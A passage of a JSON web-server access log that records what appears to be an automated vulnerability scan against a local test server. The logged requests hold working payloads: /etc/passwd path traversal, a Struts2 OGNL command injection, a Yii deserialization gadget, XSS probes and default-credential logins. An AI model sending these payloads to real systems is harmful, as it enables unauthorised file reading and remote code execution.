HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homepage.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms5.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms6.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login/?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 